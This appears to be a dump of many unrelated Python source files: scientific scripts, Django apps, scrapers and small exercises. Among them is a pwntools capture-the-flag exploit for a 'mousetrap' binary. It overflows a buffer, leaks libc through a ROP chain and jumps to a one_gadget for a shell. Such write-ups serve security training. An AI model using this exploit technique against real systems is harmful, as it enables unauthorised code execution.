-openmc.ZPlane(z0=T_pitch * 20, boundary_type="reflective")
)
return prism
def create_prism_vertical(bot, top):
yplane_bot = +openmc.YPlane(y0=bot)
yplane_top = -openmc.YPlane(y0=top)
prism = (
+openmc.XPlane(x0=2) &
-openmc.XPlane(x0=2 + 23.1) &
yplane_bot &
yplane_top &
+openmc.ZPlane(z0=0, boundary_type="reflective") &
-openmc.ZPlane(z0=T_pitch * 20, boundary_type="reflective")
)
return prism
def create_lattice(region, pf):
try:
centers_1 = openmc.model.pack_spheres(radius=T_r5, region=region, pf=pf)
trisos_1 = [openmc.model.TRISO(T_r5, two_triso_univ, c) for c in centers_1]
prism = openmc.Cell(region=region)
lower_left_1, upper_right_1 = prism.region.bounding_box
shape = tuple(((upper_right_1 - lower_left_1) / 0.4).astype(int))
pitch_1 = (upper_right_1 - lower_left_1) / shape
lattice_1 = openmc.model.create_triso_lattice(
trisos_1, lower_left_1, pitch_1, shape, lm_graphite
)
prism.fill = lattice_1
except:
prism = openmc.Cell(region=region)
prism.fill = lm_graphite
return prism
|
from distutils.core import setup
setup(name='modulepickle',
version='0.3',
description='Dynamic module pickler',
author='Andy Jones',
author_email='andyjones.ed@gmail.com',
url='https://github.com/andyljones/modulepickle',
packages=['modulepickle'])
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name:io
Author:jason
date:2018/3/15
-------------------------------------------------
Change Activity:2018/3/15:
-------------------------------------------------
"""
import codecs
import os
class IOUtil():
@staticmethod
def load_files(files):
'''
:param files:文件列表
:return:文件内容
'''
text = []
print(files)
for file in files:
if file:
with codecs.open(file, 'rb', encoding='utf-8') as f:
text.extend(f.readlines())
return text
@staticmethod
def save_to_file(result_text, save_file):
# 保存到文件
with codecs.open(save_file, 'w', encoding='utf-8') as f:
for line in result_text:
for token in line:
f.write(token.replace('/', '\t') + '\n')#注意保存时用tab分隔符
f.write('\n')
|
from django.db import models
import datetime
from django.utils import timezone
class Post(models.Model):
title = models.CharField(max_length=200)
content = models.CharField(max_length=2000000)
pub_date = models.DateTimeField('date published')
def was_published_recently(self):
now = timezone.now()
return now - datetime.timedelta(days=1) <= self.pub_date < now
def __unicode__(self):
return self.title |
'''
Created on Oct 6, 2011
@author: Rob Waaser
'''
import ctypes
import os
if __name__ == '__main__':
print "Running using cdll.libTestDLL...."
kernel32 = ctypes.windll.kernel32
print "Running using LoadLibrary"
name = "libCrash.dll"
path = os.path.join(os.getcwd(), name)
handle = kernel32.LoadLibraryA(path)
print "Handle %x" % handle
error = kernel32.GetLastError()
print "Load returned error: " + str(error)
address = kernel32.GetProcAddress(handle, "write")
print kernel32.GetLastError()
print "Address: %x" % address
if error == 0 :
print "Freeing library handle"
kernel32.FreeLibrary(handle)
'''
dll = ctypes.cdll #cdll windll oledll
print dll.libTestDLL.add_num(2, 2)
# cdll.kernel32[1]
# hex(windll.kernel32.GetModuleHandleA(None))
# all Python types except integers, strings, and unicode strings
# have to be wrapped in their corresponding ctypes type,
print "Running using CDLL(\"libTestDLL\")...."
args = [2, 2]
print ctypes.cdll.LoadLibrary("libTestDLL")[1](*args)
print "Running using LoadLibrary"
name = "libTestDLL.dll"
path = os.path.join(os.getcwd(), name)
print "Finding library TestDLL"
print ctypes.util.find_library("libTestDLL.dll")
print "Resetting DLL search path...."
# kernel32.SetDllDirectoryA(None)
p = ctypes.create_string_buffer(500)
print kernel32.GetDllDirectoryA(500, ctypes.byref(p))
print kernel32.GetLastError()
print repr(p.raw)
print kernel32.GetWindowsDirectoryA(ctypes.byref(p), 500)
print kernel32.GetLastError()
print repr(p.raw)
print "My current path: " + os.getcwd()
print "Trying to load dll: " + path
path = path
handle = kernel32.LoadLibraryA(path)
print handle
error = kernel32.GetLastError()
print "Load returned error: " + str(error)
address = kernel32.GetProcAddress(handle, "add_num")
print kernel32.GetLastError()
print "Address: %x" % address
if error == 0 :
print "Freeing library handle"
kernel32.FreeLibrary(handle)
''' |
from openerp.osv import fields, osv
class sale_order(osv.osv):
_inherit = "sale.order"
_columns = {
'is_foc': fields.boolean('Is a FOC?', default=False, help="Check if the sale order is FOC "),
}
# class wizard_data_inherit(osv.osv):
# _inherit = "account.invoice"
#
# # _columns = {
# # 'data_wizard':
# # }
#
# def get_data(self, cr, uid, ids, context=None):
# # view_id = self.ref('mutual_reports.wiz_report_select')
# ctx({'ntn': self.NTN})
# return {
# 'name': ('wizard_open'),
# 'view_type': 'form',
# 'view_mode': 'form',
# 'res_model': 'wiz.report.selection',
# 'type': 'ir.actions.act_window',
# 'target': 'new',
# 'context': ctx,
# },
|
# -*- coding: utf-8 -*-
"""
Created on Tue May 5 02:04:57 2020
@author: filiz.aksoy
"""
def factors(a):
factors = []
if a%2 == 0 :
factors.append(2)
for i in range(3,a//2,2):
if(a%i == 0):
factors.append(i)
return factors
|
#Program to find the greatest of 3 given numbers
a = 14
b = 10
c = 3
print "Let's find the greatest of these 3 numbers"
if(a>b):
if(c>a):
print 'c is greatest'
else:
if(a==c):
print 'a and c is greatest'
else:
print 'a is greatest'
else:
if(c>b):
print 'c is greatest..'
if(b==c):
if(a==b):
print 'All are equal'
else:
print 'b and c are greatest'
else:
if(a==b):
print 'a and b is greatest'
else:
print 'b is greatest'
|
from bs4 import BeautifulSoup
import requests
import sys
from furl import furl
URL = 'https://www.google.com/search'
def getSoup(movie):
response = requests.get(URL, params={ 'q': '{0} movie imdb'.format(movie) })
html = response.content
soup = BeautifulSoup(html, 'html5lib')
return soup
def getMovieLink(movie):
movieLink = ''
soup = getSoup(movie)
searchResults = soup.findAll('div', attrs = { 'class' : 'kCrYT' })
for searchResult in searchResults:
link = searchResult.find('a')
if link:
link = link.get('href')
result = furl(link)
link = result.args['q']
linkObj = furl(link)
if linkObj.host == 'www.imdb.com':
linkObj.path.segments.append('reviews')
linkObj.path.normalize()
movieLink = linkObj.url
break
return movieLink
if __name__ == '__main__':
if len(sys.argv) == 2:
movie = sys.argv[-1]
print(getMovieLink(movie))
else:
print('The format is python <filename> <movie>') |
from bs4 import BeautifulSoup
import requests
import pandas as pd
import json
from requests.compat import urljoin
from datetime import datetime
import re
import asyncio
from asyncio import AbstractEventLoop
import aiohttp
from colorama import Fore
from collections import defaultdict
import bs4
import math
def main():
# Create loop
print(str(datetime.now().time())[:8])
loop = asyncio.get_event_loop()
user_rating, user_comment = loop.run_until_complete(get_game_ratings(loop))
with open('../data/user_ratings_190508.json', 'w') as fp:
json.dump(user_rating, fp)
with open('../data/user_comments_190508.json', 'w') as fp:
json.dump(user_comment, fp)
async def get_game_ratings(loop: AbstractEventLoop):
with open('../data/game_info_190508.json', 'r') as fp:
games_dict = json.load(fp)
pg_sz = 100
xml_bs = f'https://www.boardgamegeek.com/xmlapi2/thing?type=boardgame&ratingcomments=1&pagesize={pg_sz}'
ratings_list = [(x['game_id'], x['usersrated']) for x in games_dict]
ratings_list.sort(key=lambda tup: tup[1], reverse=False)
group_sz = 50
user_rating = []
user_comment = []
group_xml = []
for group_num in range(math.ceil(len(ratings_list) / group_sz)):
group_ids = ratings_list[group_num * group_sz:(group_num + 1) * group_sz]
pg_ct = math.ceil(group_ids[0][1] / pg_sz)
# group_xml[group_num] = []
for pg_num in range(1, pg_ct + 1):
xml_ids = ','.join([x[0] for x in group_ids if x[1] > (pg_num - 1) * pg_sz])
xml_url = f'{xml_bs}&page={pg_num}&id={xml_ids}'
group_xml.append((loop.create_task(get_xml(xml_url)), pg_num))
# break
for pg_xml, n in group_xml:
xml = await pg_xml
user_rating, user_comment = get_pg_ratings(xml, user_rating, user_comment)
print(f'group {n} at {(str(datetime.now().time())[:8])}', flush=True)
print(5)
print(str(datetime.now().time())[:8])
return user_rating, user_comment
async def get_xml(xml_pg_url):
connector = aiohttp.TCPConnector(limit_per_host=2)
async with aiohttp.ClientSession(connector=connector) as session:
async with session.get(xml_pg_url) as resp:
resp.raise_for_status()
xml = await resp.text()
return xml
def get_pg_ratings(html: str, user_ratings: list, user_comments: list):
# print(Fore.CYAN + f"Getting ids for page number {page_number}", flush=True)
soup = BeautifulSoup(html, 'xml')
items = soup.find_all('item')
for item in items:
# item_dict = defaultdict(dict)
rating_list = [x for x in item.comments.contents if type(x) == bs4.element.Tag]
comment_list = [x for x in rating_list if x['value'] != '']
for rating in rating_list:
user_ratings.append({'user':rating['username'],
'rating': float(rating['rating']),
'game_id': item['id']})
# ratings_dict[item['id']].update({rating['username']: float(rating['rating'])})
# users_dict[rating['username']].update({item['id']: float(rating['rating'])})
for comment in comment_list:
user_comments.append({'user': comment['username'],
'rating': float(comment['rating']),
'game_id': item['id'],
'comment': comment['value']})
# item_dict[float(comment['rating'])].update({comment['username']: comment['value']})
# comments_dict[item['id']].update({comment['username']: [comment['value'], float(comment['rating'])]})
return user_ratings, user_comments
if __name__ == '__main__':
main()
# game_items = game_data_async()
# export_csv(game_items)
# print(5)
|
#coding=utf-8
from google.appengine.ext import db
class GroupType(db.Model):
title=db.StringProperty()
group_type_id=db.IntegerProperty()
description=db.StringProperty()
class Group(db.Model):
group_gid=db.StringProperty()
group_id=db.IntegerProperty()
title=db.StringProperty()
description=db.StringProperty()
mod_dt=db.DateTimeProperty()
group_type=db.ReferenceProperty(GroupType)
group_modules=db.ListProperty(db.Key)
@property
def users(self):
return User.gql("WHERE users_groups=:1",self.key())
class Module(db.Model):
google_cal_id=db.StringProperty()
module_id=db.IntegerProperty()
title=db.StringProperty()
description=db.StringProperty()
mod_dt=db.DateTimeProperty()
@property
def groups(self):
return Group.gql("WHERE group_modules=:1",self.key())
class User(db.Model):
gID=db.StringProperty()
uID=db.StringProperty()
user_id=db.IntegerProperty()
name=db.StringProperty()
mod_dt=db.DateTimeProperty()
users_groups=db.ListProperty(db.Key) |
# @Title: 二叉搜索树节点最小距离 (Minimum Distance Between BST Nodes)
# @Author: 2464512446@qq.com
# @Date: 2020-11-27 16:15:35
# @Runtime: 40 ms
# @Memory: 13.4 MB
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def minDiffInBST(self, root: TreeNode) -> int:
self.pre = -math.inf
self.res = math.inf
def helper(root):
if not root:
return
helper(root.left)
self.res = min(self.res,root.val-self.pre)
self.pre = root.val
helper(root.right)
helper(root)
return self.res
|
#!/usr/bin/env python
# Standard imports
import argparse
import os
# TopEFT imports
from TopEFT.Generation.Configuration import Configuration
from TopEFT.Generation.Process import Process
from TopEFT.Tools.u_float import u_float
# Logging
import TopEFT.Tools.logger as logger
#find all processes
process_path = os.path.expandvars("$CMSSW_BASE/src/TopEFT/Generation/data/processCards")
processes = [os.path.splitext(f)[0] for f in os.listdir(process_path) if os.path.isfile(os.path.join(process_path, f)) and f.endswith('.dat')]
# Argument parser
argParser = argparse.ArgumentParser(description = "Argument parser")
argParser.add_argument('--process', action='store', default='ttZ', choices=processes, help="Which process?")
argParser.add_argument('--model', action='store', default='HEL_UFO', choices=['ewkDM', 'ewkDM2', 'ewkDMGZ', 'HEL_UFO', 'TopEffTh', 'dim6top_LO', 'dim6top_LO_v2'], help="Which madgraph model?")
argParser.add_argument('--couplings', action='store', default=[], nargs='*', type = str, help="Give a list of the non-zero couplings with values, e.g. NAME1 VALUE1 NAME2 VALUE2")
argParser.add_argument('--overwrite', action='store_true', help="Overwrite exisiting x-sec calculation and gridpack")
argParser.add_argument('--keepWorkspace', action='store_true', help="keep the temporary workspace?")
argParser.add_argument('--nEvents', action='store', default = 50000, type=int, help="Number of Events" )
argParser.add_argument('--logLevel', action='store', nargs='?', choices=['CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG', 'TRACE', 'NOTSET'], default='INFO', help="Log level for logging" )
argParser.add_argument('--makeGridpack',action='store_true', help="make gridPack?" )
argParser.add_argument('--calcXSec', action='store_true', help="calculate x-sec?" )
args = argParser.parse_args()
logger = logger.get_logger(args.logLevel, logFile = None)
logger.debug("Coupling arguments: %r", args.couplings )
# Single argument -> interpret as file
if len(args.couplings) == 1 and os.path.isfile(args.couplings[0]) :
with open(args.couplings[0], 'r') as f:
param_points = [ line.rstrip().split() for line in f.readlines() ]
# Interpret couplings
#elif len(args.couplings)>=2:
elif len(args.couplings)==0 or len(args.couplings)>=2:
# make a list of the form [ ['c1', v1, v2, ...], ['c2', ...] ] so we can recurse in the couplings c1,c2,...
coupling_list = []
for a in args.couplings:
try:
val = float(a)
except ValueError:
coupling_list.append( [ a, [] ] )
val = None
if val is not None: coupling_list[-1][1].append( float(a) )
# recursively make a for loop over all couplings
def recurse( c_list ):
var, vals = c_list[-1]
pairs = [ (var, val) for val in vals ]
if len(c_list)>1:
rec = recurse(c_list[:-1])
return [ r + p for p in pairs for r in rec]
else:
return pairs
param_points = recurse( coupling_list ) if len(coupling_list)>0 else [[]]
else:
logger.error("Need an even number of coupling arguments of the format coupling1, value1, value2, ... , coupling2, value3, ... . Got %r", args.couplings )
raise ValueError
# Create configuration class
config = Configuration( model_name = args.model )
# Process all the coupling points
for i_param_point, param_point in enumerate(param_points):
logger.info( "Processing parameter point %i/%i", i_param_point+1, len(param_points) )
# Interpret coupling argument list
names = param_point[::2]
values = map(float,param_point[1::2])
modification_dict = {c:v for c,v in zip( names, values ) }
# Let's not leave the user in the dark
logger.info("Model: %s", args.model)
logger.info("Process: %s", args.process)
logger.info("Couplings: %s", ", ".join( [ "%s=%5.4f" % c for c in modification_dict.items()] ))
# make process
p = Process(process = args.process, nEvents = args.nEvents, config = config)
# Make grid pack
if args.makeGridpack:
gridpack = p.makeGridpack(modified_couplings = modification_dict, overwrite = args.overwrite)
# calculate x-sec
if args.calcXSec:
xsec = p.xsec(modified_couplings = modification_dict, overwrite = args.overwrite)
logger.info("xsec: %s ", repr(xsec) )
if not args.keepWorkspace: config.cleanup()
|
# v4
# use class decorator
# works ok
from inspect import Parameter, Signature
def make_signature(names):
return Signature(Parameter(name, Parameter.POSITIONAL_OR_KEYWORD) for name in names)
def sig_deco(*names):
def wrapper(cls):
# NOTICE! cls here is Stock cls object
cls.__signature__ = make_signature(names)
return cls
return wrapper
class Structure:
__signature__ = Signature()
def __init__(self, *args, **kwargs):
bound = self.__signature__.bind(*args, **kwargs)
for field, val in bound.arguments.items():
setattr(self, field, val)
@sig_deco("name", "shares", "price")
class Stock(Structure):
pass
@sig_deco("hostname", "port")
class Address(Structure):
pass
|
a = 7
for i in ( 2, a-1 ):
if a % i == 0 :
print " The given number ", a ," is not prime"
else :
print " The given number ", a ,"is prime"
|
class InvalidCardDetailsError(Exception):
""" raise when Card details are not valid"""
class PaymentFailed(Exception):
"""raise when transaction is failed """
class PaymentGatewayNotAvailableError(Exception):
"""raise when payment gateway is not available"""
class InvalidAmountError(Exception):
"""raise when amount is not valid """
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Exceptions related to `chzip`"""
class DownloadException(Exception):
"""Exception raised when a problem when downloading a file occured."""
class UpgradeException(Exception):
"""Exception raised to signal a failure in the upgrade process."""
|
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 26 11:40:52 2018
@author: pmarella
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
data = pd.read_csv("Testrail_data.csv")
test_without_defect = data.loc[data["TC-Defect"].isnull()]
test_with_defect = data.loc[data["TC-Defect"].notna()]
test_failed = data.loc[data["Status"] == "Failed"]
test_passed = data.loc[data["Status"] == "Passed"]
test_blocked = data.loc[data["Status"] == "Blocked"]
#print(test_blocked)
#print(data["Test-Case"].value_counts())
#print(data["Test-Run"].value_counts())
# pie chart for job
plt.pie(data["Test-Run"].value_counts().values, autopct='%1.2f%%', labels=data["Test-Run"].value_counts().keys())
plt.title("Pie chart of Test-Run")
plt.show()
test_run_status = data.groupby(["Test-Run", "Status"]).size().unstack(fill_value=0)
print(test_run_status)
width=0.4
p1 = plt.bar(test_run_status["Passed"].keys(), test_run_status["Passed"].values)
p2 = plt.bar(test_run_status["Failed"].keys(), test_run_status["Failed"].values, width)
plt.yticks(np.arange(0,300,25))
plt.legend((p1, p2), ("Passed", "Failed"))
plt.show()
test_run_status = test_run_status.loc[test_run_status[""]]
print(test_run_status)
width=0.4
p1 = plt.bar(test_run_status["Passed"].keys(), test_run_status["Passed"].values)
p2 = plt.bar(test_run_status["Failed"].keys(), test_run_status["Failed"].values, width)
plt.yticks(np.arange(0,300,25))
plt.legend((p1, p2), ("Passed", "Failed"))
plt.show() |
import models.model as model
def main():
"""
Count the number of earthquakes in the regions of: EastJapan, Kanto, Kansai, Tohoku with mag>3.0 or mag>5.0
"""
year = 2006
for i in range(5):
print(year + i)
a = model.loadModelFromFile(
"../Zona/3.0EastJapanreal" + str(year + i) + ".txt")
print("EastJapan")
print(sum(a.bins))
a = model.loadModelFromFile(
"../Zona/3.0Kantoreal" + str(year + i) + ".txt")
print("Kanto")
print(sum(a.bins))
a = model.loadModelFromFile(
"../Zona/3.0Kansaireal" + str(year + i) + ".txt")
print("Kansai")
print(sum(a.bins))
a = model.loadModelFromFile(
"../Zona/3.0Tohokureal" + str(year + i) + ".txt")
print("Tohoku")
print(sum(a.bins))
year = 2006
for i in range(5):
print(year + i)
a = model.loadModelFromFile(
"../Zona/5.0EastJapanreal" + str(year + i) + ".txt")
print("EastJapan")
print(sum(a.bins))
a = model.loadModelFromFile(
"../Zona/5.0Kantoreal" + str(year + i) + ".txt")
print("Kanto")
print(sum(a.bins))
a = model.loadModelFromFile(
"../Zona/5.0Kansaireal" + str(year + i) + ".txt")
print("Kansai")
print(sum(a.bins))
a = model.loadModelFromFile(
"../Zona/5.0Tohokureal" + str(year + i) + ".txt")
print("Tohoku")
print(sum(a.bins))
if __name__ == "__main__":
main()
|
from django.shortcuts import render
# Create your views here.
from list_strings.forms import ListStringsForm
from list_strings.utils import longest_substring
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
def home(request):
res = ''
if request.method == 'POST':
form = ListStringsForm(request.POST)
if form.is_valid():
data = form.cleaned_data['strings']
data = data.strip().split("\n")
res = longest_substring(data)
else:
form = ListStringsForm()
dd = {
'form': form,
'res': res,
}
return render(request, 'list_strings/index.html', dd)
class LongestStringRESTView(APIView):
def _process(self, data):
print("**** data {}".format(data))
data = data.strip().split("\n")
res = longest_substring(data)
return res
def post(self, request, *args, **kw):
print("request.POST {}".format(request.POST))
result = self._process(request.POST.get('data', ''))
result = {'result': result}
response = Response(result, status=status.HTTP_200_OK)
return response
def get(self, request, *args, **kw):
print("request.GET {}".format(request.GET))
# Process any get params that you may need
# If you don't need to process get params,
# you can skip this part
result = self._process(request.GET.get('data', ''))
result = {'result': result}
response = Response(result, status=status.HTTP_200_OK)
return response
|
from pwn import *
import sys
#import kmpwn
sys.path.append('/home/vagrant/kmpwn')
from kmpwn import *
#fsb(width, offset, data, padding, roop)
#config
context(os='linux', arch='i386')
context.log_level = 'debug'
FILE_NAME = "./mousetrap"
HOST = "cha.hackpack.club"
PORT = 41719
if len(sys.argv) > 1 and sys.argv[1] == 'r':
conn = remote(HOST, PORT)
else:
conn = process(FILE_NAME)
elf = ELF(FILE_NAME)
addr_main = elf.symbols["main"]
rdi_ret = 0x400923
plt_puts = elf.plt["puts"]
got_puts = elf.got["puts"]
got_read = elf.got["read"]
#addr_dynsym = elf.get_section_by_name('.dynsym').header['sh_addr']
#
libc = ELF('./libc.so')
off_read = libc.symbols["read"]
gadget = [0x4f2c5, 0x4f322, 0x10a38c]
def exploit():
# loop1
payload = "A"*(0x20-0x8)
payload += p64(0x200)
conn.sendafter("Name: ", payload)
payload = "\x00"*(0x120+8)
#payload += p64(rdi_ret)
#payload += p64(got_puts)
#payload += p64(plt_puts)
payload += p64(rdi_ret)
payload += p64(got_read)
payload += p64(plt_puts)
payload += p64(addr_main)
conn.sendlineafter(": ", payload)
conn.recvuntil("died!")
#libc_puts = u64(conn.recv(6)+"\x00\x00")
#conn.recvline()
#print hex(libc_puts)
libc_read = u64(conn.recv(6)+"\x00\x00")
libc_base = libc_read - off_read
one_gadget = libc_base + gadget[0]
print hex(libc_base)
payload = "A"*(0x20-0x8)
payload += p64(0x200)
conn.sendafter("Name: ", payload)
payload = "\x00"*(0x120+8)
payload += p64(one_gadget)
conn.sendlineafter(": ", payload)
conn.interactive()
if __name__ == "__main__":
exploit()
|
# step 步驟
# 建立 interface 介面
from abc import ABC, abstractmethod # Abstract Base Class 抽象類別
class Step(ABC): # Base class
def __init__(self):
pass
@abstractmethod
def process(self, transporter, inputs, utils): # 執行
pass
class StepException(Exception): # 例外捕捉
pass
|
from math import tanh
from mlpnn.Abstracts.Function import Function
class HyperbolicTangent(Function):
def function(self):
def inner(x, beta):
return tanh(beta * x)
return inner
def derivative(self):
def inner(x):
return 1 - x * x
return inner
|
from datetime import date
from django.contrib.auth.models import User
from django.test import TestCase, Client
from planner.models import Garden, Vegetable, Bed, CultivatedArea, ForthcomingOperation, COWithDate, History
class AlertsViewsTests(TestCase):
def setUp(self):
self.client = Client()
self.username = 'test_user'
self.email = 'test@whatever.com'
self.password = 'test'
self.user = User.objects.create_user(self.username, self.email, self.password)
self.garden = Garden.objects.create(name="MyGarden", postal_code=1000)
History.objects.create(garden=self.garden)
self.garden.users.add(self.user)
self.vegetable = Vegetable.objects.create(name="Tomato", variety="Yellow Pearshaped", garden=self.garden)
self.surface = Bed.objects.create(name="Bedding", garden=self.garden, width=250, length=250)
operation = COWithDate.objects.create(name="Work", vegetable=self.vegetable, absoluteDate=date(2018, 8, 3))
area = CultivatedArea.objects.create(vegetable=self.vegetable, garden=self.garden, label="Tomato area",
surface=self.surface)
self.alert = ForthcomingOperation.objects.create(area_concerned=area, original_cultural_operation=operation)
def test_alert_view_index(self):
response = self.client.get('/{}/alerts'.format(self.garden.id))
self.assertRedirects(response, expected_url='/login/?next=/{}/alerts'.format(self.garden.id), status_code=302)
self.client.login(username=self.username, password=self.password)
response = self.client.get('/{}/alerts'.format(self.garden.id))
self.assertEqual(response.status_code, 200)
def test_add_seed(self):
self.client.login(username=self.username, password=self.password)
response = self.client.get('/{}/alerts/add_seed'.format(self.garden.id))
self.assertEqual(response.status_code, 200)
form = {'vegetable_selection': self.vegetable.id, "seeding_label": "My seeding",
"surface_selection": self.surface.id}
self.assertEqual(len(CultivatedArea.objects.filter(label="My seeding")), 0)
response = self.client.post('/{}/alerts/add_seed'.format(self.garden.id), form)
self.assertRedirects(response, '/{}/alerts'.format(self.garden.id))
self.assertEqual(len(CultivatedArea.objects.filter(label="My seeding")), 1)
def test_validate_alert(self):
self.client.login(username=self.username, password=self.password)
response = self.client.get('/{}/alerts/{}/validate'.format(self.garden.id, self.alert.id))
self.assertEqual(response.status_code, 200)
form = {'execution_date': '2018-04-04', 'duration': '00:15:15', 'validation_note': ""}
response = self.client.post('/{}/alerts/{}/validate'.format(self.garden.id, self.alert.id), form)
self.assertRedirects(response, '/{}/alerts'.format(self.garden.id))
self.assertTrue(ForthcomingOperation.objects.get(pk=self.alert.id).is_done)
self.assertEqual(ForthcomingOperation.objects.get(pk=self.alert.id).execution_date, date(2018, 4, 4))
def test_postpone_alert(self):
self.client.login(username=self.username, password=self.password)
response = self.client.get('/{}/alerts/{}/postpone'.format(self.garden.id, self.alert.id))
self.assertEqual(response.status_code, 200)
form = {'postponement_in_days': "5"}
response = self.client.post('/{}/alerts/{}/postpone'.format(self.garden.id, self.alert.id), form)
self.assertRedirects(response, '/{}/alerts'.format(self.garden.id))
self.assertEqual(ForthcomingOperation.objects.get(pk=self.alert.id).postponement, 5)
def test_delete_useless_alert(self):
self.client.login(username=self.username, password=self.password)
response = self.client.get('/{}/alerts/{}/delete'.format(self.garden.id, self.alert.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(self.garden.history.historyitem_set.count(), 0)
form = {'deletion_justification': "useless", "note": ""}
response = self.client.post('/{}/alerts/{}/delete'.format(self.garden.id, self.alert.id), form)
self.assertRedirects(response, '/{}/alerts'.format(self.garden.id))
self.assertTrue(ForthcomingOperation.objects.get(pk=self.alert.id).is_done)
self.assertEqual(self.garden.history.historyitem_set.count(), 1)
def test_delete_destruction_alert(self):
self.client.login(username=self.username, password=self.password)
response = self.client.get('/{}/alerts/{}/delete'.format(self.garden.id, self.alert.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(self.garden.history.historyitem_set.count(), 0)
form = {'deletion_justification': "destruction", "note": ""}
response = self.client.post('/{}/alerts/{}/delete'.format(self.garden.id, self.alert.id), form)
self.assertRedirects(response, '/{}/alerts'.format(self.garden.id))
self.assertTrue(ForthcomingOperation.objects.get(pk=self.alert.id).is_done)
self.assertEqual(self.garden.history.historyitem_set.count(), 1)
def test_print_forthcoming_operations(self):
self.client.login(username=self.username, password=self.password)
response = self.client.get('/{}/alerts/print'.format(self.garden.id))
self.assertEqual(response.status_code, 200)
# Commented because Travis does not seem to be able to generate latex pdf
# form = {'delay_to_print': "8"}
# response = self.client.post('/{}/alerts/print'.format(self.garden.id), form)
# self.assertEqual(response.status_code, 200)
|
"""
E160_gui.py
"""
import sys
from E160_config import CONFIG_DELTA_T
import time
from E160_environment import *
from E160_graphics import *
def main():
# instantiate robot navigation classes
environment = E160_environment()
graphics = E160_graphics(environment)
# set time step size in seconds
deltaT = CONFIG_DELTA_T
first_tick = True
# loop over time
while True:
# update graphics, but stop the thread if user stopped the gui
if not graphics.update():
break
if first_tick:
input()
first_tick = False
# update robots
environment.update_robots(deltaT)
# log all the robot data
environment.log_data()
# maintain timing
time.sleep(deltaT)
if __name__ == "__main__":
main()
|
import math
class Quaternion:
def __init__(self, axis=None, angle=None, position=None, quat=None):
if axis and angle:
theta = angle / 2.0
self.i = [axis[0] * math.sin(theta), axis[1] * math.sin(theta), axis[2] * math.sin(theta)]
self.r = math.cos(theta)
self.conj = [self.r, -self.i[0], -self.i[1], -self.i[2]]
elif position:
self.r = 0.0
self.i = [position[0], position[1], position[2]]
elif quat:
self.r = quat[0]
self.i = [quat[1], quat[2], quat[3]]
else:
self.i = [0.0, 0.0, 0.0]
self.r = 0.0
self.conj = [0.0, 0.0, 0.0, 0.0]
def rotatePosition(self, pos):
tmp = self.multiply(pos)
result = tmp.multiply(Quaternion(quat=self.conj))
return [result.i[0], result.i[1], result.i[2]]
def multiply(self, other):
tmp = Quaternion()
tmp.r = (self.r * other.r) - (self.i[0] * other.i[0]) - (self.i[1] * other.i[1]) - (self.i[2] * other.i[2])
tmp.i[0] = (self.r * other.i[0]) + (self.i[0] * other.r) + (self.i[1] * other.i[2]) - (self.i[2] * other.i[1])
tmp.i[1] = (self.r * other.i[1]) - (self.i[0] * other.i[2]) + (self.i[1] * other.r) + (self.i[2] * other.i[0])
tmp.i[2] = (self.r * other.i[2]) + (self.i[0] * other.i[1]) - (self.i[1] * other.i[0]) + (self.i[2] * other.r)
return tmp
def main():
# Get relevant coordinates from Pdb file
coordinates = getCoordinatesPdbFile('data/1lyd.pdb')
rotatedCoordinates = []
my_axis = [0, 2 / math.sqrt(5), 1 / math.sqrt(5)]
my_angle = 30.0
my_angle = math.radians(my_angle)
my_quat = Quaternion(axis=my_axis, angle=my_angle)
# Rotate coordinates
for i in range(len(coordinates)):
rotated_vector = my_quat.rotatePosition(Quaternion(position=coordinates[i]))
rotatedCoordinates.append(rotated_vector)
# Store coordinates back in Pdb file
setCoordinatesPdbFile('data/1lyd.pdb', 'data/1lyd_rotated.pdb', rotatedCoordinates)
def setCoordinatesPdbFile(file_to_read, file_to_write, rotatedCoordinates):
with open(file_to_read) as f:
list_ = list(f)
i = 0
with open(file_to_write, 'w') as output:
for line in list_:
id_ = line.split()[0]
if id_ == 'ATOM' or id_ == 'HETATM':
output.write("{:6s}{:5s} {:^4s}{:1s}{:3s} {:1s}{:4s}{:1s} {:8.3f}{:8.3f}{:8.3f}{:6.2s}{:6.2s} {:>2s}{:2s}\n".format(
line[0:6], line[6:11], line[12:16], line[16:17], line[17:20], line[21:22], line[22:26], line[26:27],
rotatedCoordinates[i][0], rotatedCoordinates[i][1], rotatedCoordinates[i][2], line[54:60],
line[60:66], line[76:78], line[78:80]))
i += 1
else:
output.write(line)
def getCoordinatesPdbFile(fileName):
coordinateList = []
for line in open(fileName):
line_ = line.split()
id_ = line_[0]
if id_ == 'ATOM' or id_ == 'HETATM':
coordinateList.append([float(line_[6]), float(line_[7]), float(line_[8])])
return coordinateList
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
main()
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
|
# coding: utf-8
import random
import string
import hashlib
import base64
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
from django.db import models
class UserAuthCode(object):
def __init__(self, secret, salt_len=8, hash=hashlib.sha256):
self.secret = secret
self.salt_len = salt_len
self.hash = hash
def salt(self):
s = [random.choice(string.letters + string.digits)
for i in xrange(self.salt_len)]
return "".join(s)
def digest(self, user, salt):
# Use username, email and date_joined to generate digest
auth_message = ''.join((self.secret, user.username, user.email,
str(user.date_joined), salt))
md = self.hash()
md.update(auth_message)
return base64.urlsafe_b64encode(md.digest()).rstrip('=')
def auth_code(self, user):
salt = self.salt()
digest = self.digest(user, salt)
return "%s%s" % (salt, digest)
def is_valid(self, user, auth_code):
#import pdb; pdb.set_trace()
salt = auth_code[:self.salt_len]
digest = auth_code[self.salt_len:]
# CAVEAT: Make sure UserAuthCode cannot be used to reactivate locked
# profiles.
if user.last_login >= user.date_joined:
return False
return digest == self.digest(user, salt)
class Profile(models.Model):
''' User profile'''
SEX_UNKNOWN = 0
SEX_MALE = 1
SEX_FEMALE = 2
SEX_CHOICES = (
(SEX_UNKNOWN, _("unknown")),
(SEX_MALE, _("male")),
(SEX_FEMALE, _('female'))
)
user = models.OneToOneField(User)
sex = models.SmallIntegerField(
blank=True, null=True,
